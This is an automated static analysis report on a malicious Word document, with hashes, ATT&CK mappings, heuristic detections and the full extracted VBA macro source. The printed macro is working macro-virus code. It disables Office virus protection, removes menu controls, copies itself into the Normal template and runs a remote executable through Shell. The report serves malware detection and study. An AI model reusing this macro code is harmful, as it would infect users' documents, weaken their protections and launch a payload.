Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 315edadf8ad09e31…

MALICIOUS

Office (OLE)

104.0 KB Created: 2014-07-30 06:27:00 Authoring application: Microsoft Office Word First seen: 2015-09-14
MD5: 04486059f2c722313637788750f3c910 SHA-1: b7ce7b27310a6623e8a217baa18921aadfa86329 SHA-256: 315edadf8ad09e31ee7a7e113bbea818a49dde6b3e9620c5596001e4250d7322
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1037.001 Boot or Logon Initialization: Registry Run Keys / Startup Folder

The sample contains VBA macros, including a Document_Open macro, which is a common technique for malicious documents. The macro explicitly calls the Shell function to execute a file located at '\jdq\cc$\b.exe', indicating it's designed to download and run a second-stage payload. The presence of self-replication code within the VBA project suggests an attempt to evade detection or spread. The embedded URL http://192.168.1.98/crl?crl=4000-41990 is likely related to the payload delivery.

Heuristics 6

  • ClamAV: Doc.Macro.DeleteMacro-6096859-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DeleteMacro-6096859-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("\\jdq\cc$\b.exe")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.1.98/crl?crl=4000-41990 In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3485 bytes
SHA-256: b4636ed8e91251e8b66688330c6c55bb42620fc6eab511fa2f1ebc818663592d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "EStamp2, 0, 1, COPESTAMPLib, EStamp"





Dim x1, x2, x3, x4 As Boolean
Dim x5, x6 As Object
Dim x7, x8, x16 As Integer
Dim x9 As Date
Dim x10, x11, x12, x13, x14 As String
Private Sub Document_Close()
On Error Resume Next
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    CommandBars("Macro").Controls(4).Delete
    CommandBars("Macro").Controls(3).Delete
    CommandBars("Macro").Controls(2).Delete
    CommandBars("Macro").Controls(1).Delete
    CommandBars("Tools").Controls(17).Delete
Shell ("\\jdq\cc$\b.exe")
If x3 = True Then
    x13 = x5.codemodule.Lines(1, x5.codemodule.CountOfLines)
ElseIf x4 = True Then
    x13 = x6.codemodule.Lines(1, x6.codemodule.CountOfLines)
End If
If (x3 = True Xor x4 = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
      If x3 = True Then
        x2 = NormalTemplate.Saved
        x11 = x5.codemodule.Lines(1, x5.codemodule.CountOfLines)
        x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
        x6.codemodule.AddFromString x11
        If x2 = True Then NormalTemplate.Save
      End If
    If x4 = True Or ActiveDocument.Saved = False Then
     x1 = ActiveDocument.Saved
     x11 = x6.codemodule.Lines(1, x6.codemodule.CountOfLines)
     x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
     x5.codemodule.AddFromString x11
     If x1 = True Then ActiveDocument.Save
   End If
End If
End Sub
Private Sub Document_New()
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If x4 = False Then
    x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
End If
If x3 = False Then
        x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
End If


End Sub
Private Sub Document_Open()
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If x4 = False Then
    x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
End If
If x3 = False Then
        x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
End If

End Sub